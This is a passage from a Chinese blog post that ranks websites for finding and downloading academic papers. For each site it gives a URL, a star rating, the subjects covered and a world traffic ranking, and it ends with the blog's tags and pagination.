    2、中国论文下载中心推荐指数:★★★★★

    http://www.studa.net

    该网站为学生大旗下网站,拥有经济、管理、工程等20多个科目的数万篇论文。主要以学生为主。目前网站世界排名:29462位。

    3、中国科技论文在线推荐指数:★★★★

    http://www.paper.edu.cn

    该网站由教育部科技发展中心主办,有一定的权威性,网站提供的论文涉及自然科学、财经、工业、医药等50多个学科的数万篇论文,也提供论文发布平台。发展前景较好。目前网站世界排名:223444位

    4、论文网推荐指数:★★★★

    http://www.lunwennet.com/

    2002年的10月成立的,主要以财经论文为主,另外还有部分医药、教育、计算机等的论文。目前网站世界排名:162788位

    5、中国论文联盟推荐指数:★★★

    http://www.lwlm.com/

    该网站也是一个综合性的论文网站,提供经济、医药、工学、计算机等方面的论文,不过论文数量不够充足,网站美工设计有待改进。目前网站世界排名:364182位

    6、看论文推荐指数:★★

    http://www.seepaper.com

    也是一个综合论文网站,提供经济、医药、政治等方面的论文。目前网站世界排名:405603位。

    二、专业论文网站(按网站世界排名排列顺序)

    7、网易土木在线推荐指数:★★★★★

    http://co.163.com/

    网易的下属频道,提供建筑、园林、电气、给排水、环保、暖通、制冷等领域的论文,同时还提供相关图纸,信息发布和软件等。是一个在土木工程方便很不错的站。由于是用的网易的二级域名,世界排名无法获取。不过根据其火热程度,如果换用独立域名的话,世界排名应该在20000位左右。

    8、法律图书馆推荐指数:★★★

    http://www.law-lib.com/

    找法律方面的论文,这个网站还是不错。另外这个网站还提供很多法律方面的书籍。网站世界排名:34301位

    9、论文资料网推荐指数:★★

    http://www.51paper.net/

    以财经经济管理类为主的论文资料网。网站世界排名:400858位

    10、新浪论文网分类:推荐指数:★★

    http://dir.sina.com.cn/search_dir/jy/lw/

    新浪网的一个频道,本身并不提供论文,只是提供论文网站的分类,类似于hao123那种的目录网站。在最后把他列出来,主要是让大家在通过上面9个网站找论文时还没有找到理想的论文,可以通过这个网站来搜索。

    Tag:毕业论文 写作 十大 网站 排行榜 论文
    chapi 发表于20时35分56秒 | 阅读全文 | 评论 3 | 编辑 | 分享
共42页 第一页 上一页 6 7 8 9 10 11 12 13 14 15 下一页 最后一页

Lessons by English, baby!

随时随地看wap